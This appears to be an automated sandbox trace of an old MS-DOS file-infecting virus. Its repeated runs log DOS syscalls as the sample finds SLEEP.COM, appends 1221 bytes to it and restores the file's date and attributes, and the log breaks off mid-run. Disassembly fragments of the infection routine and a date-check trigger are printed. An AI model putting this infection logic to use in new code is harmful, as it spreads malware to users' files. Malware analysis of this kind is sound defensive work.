Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.223225902Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.22826661Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.230926006Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.231740222Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.238933695Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.246516507Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.250424114Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.252237051Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.264051131Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.265195246Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.269265455Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.271161501Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.272709713Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.274253214Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.275656482Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.281472995Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.282439594Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.289508141Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.299374764Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.301949933Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.313598703Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.320178895Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.322162922Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.332458597Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.33429096Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.341150103Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.344531865Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.347504141Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.350368907Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.353092228Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.368451533Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.370276909Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.378509333Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.395555843Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.398623315Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.404892087Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.408971134Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.410428406Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.417025152Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.418466896Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.422533871Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.425558487Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.427720218Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.429448781Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.4309046Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.436851039Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.437966344Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.443448654Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.452253449Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.453918132Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.456948912Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.343368279Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.346930099Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.351314885Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.352393202Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.359017383Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.366415799Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.373178749Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.375386726Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.62792985Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.630222258Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.643950272Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.653118913Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.656461117Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.659991584Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.663897776Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.674846591Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.67701963Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.687170069Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.699408365Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.702257993Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.716382681Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.723724867Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.726234128Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.737537058Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.739852513Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.759217416Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.763585482Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.77675673Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.778974026Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.780659088Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.790248148Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.792126817Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.80117108Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.813017374Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.816155855Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.823342183Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.832165687Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.83693021Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.849139751Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.852422923Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.860684112Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.864203773Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.867953607Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.872320759Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.874783125Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.88594189Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.88922438Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.898282521Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.910735607Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.914506014Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.920093892Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.385564818Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.389160891Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.393465611Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.394507344Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.401314448Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.40875106Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.415876264Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.4183215Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.635629625Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.638500211Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.646470926Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.658123902Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.660948602Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.663825123Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.666438371Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.680289221Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.686848237Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.696596295Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.708900769Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.712474495Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.722275109Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.731041103Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.733801681Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.747836352Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.750280106Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.758284695Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.762185287Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.767504734Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.770863102Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.773435861Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.785754776Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.787923842Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.797255124Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.818941178Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.822320567Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.830312002Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.839378756Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.842480393Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.854315924Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.856953536Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.865181959Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.86872615Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.872219314Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.876666528Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.879183987Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.889712151Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.892207405Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.901546727Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.913004238Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.916853908Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.92207945Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.532182528Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.542355162Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.545578057Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.546724424Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.554646433Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.561544261Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.568173943Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.570555426Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.58650975Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.588124219Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.595108036Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.598264804Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.601043922Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.603772087Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.606195966Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.615037963Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.61647815Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.624093098Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.634068628Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.637227209Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.650710494Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.65685746Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.658771215Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.67083839Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.672580445Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.679261628Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.683137843Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.68619577Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.688985208Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.69207092Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.702943776Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.704337177Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.712326762Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.722405075Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.725259557Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.732098549Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.738708806Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.741081989Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.750986143Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.753200435Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.759851221Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.762435712Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.765853574Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.768324517Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.770329131Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.780258191Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.781728512Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.789399141Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.799991317Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.802372692Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.806569517Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.741073619Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.745388614Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.75053577Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.752282982Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.765630127Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.779639121Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.786880593Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.789281358Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.808284372Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.809852141Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.815099966Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.818906747Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.823633069Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.826334243Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.834272446Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.845881725Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.84804859Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.857998047Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.870038432Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.873472832Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.881555559Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.88962277Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.892512707Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.904121885Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.907193803Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.915898862Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.91945983Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.923644385Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.926946464Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.929538526Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.947594114Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.94973058Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.961137593Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.973968122Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.977623718Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.985597468Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.994565663Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.997656567Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.009487122Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.012465067Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.020830403Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.024338556Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.027549334Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.031678818Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.034239104Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.044742492Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.047834351Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.057278939Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.06856161Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.07199178Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.083794376Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.879366588Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.883403367Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.887730577Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.889117787Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.900832396Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.912078477Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.918733626Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.921784216Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.938473073Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.940772709Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
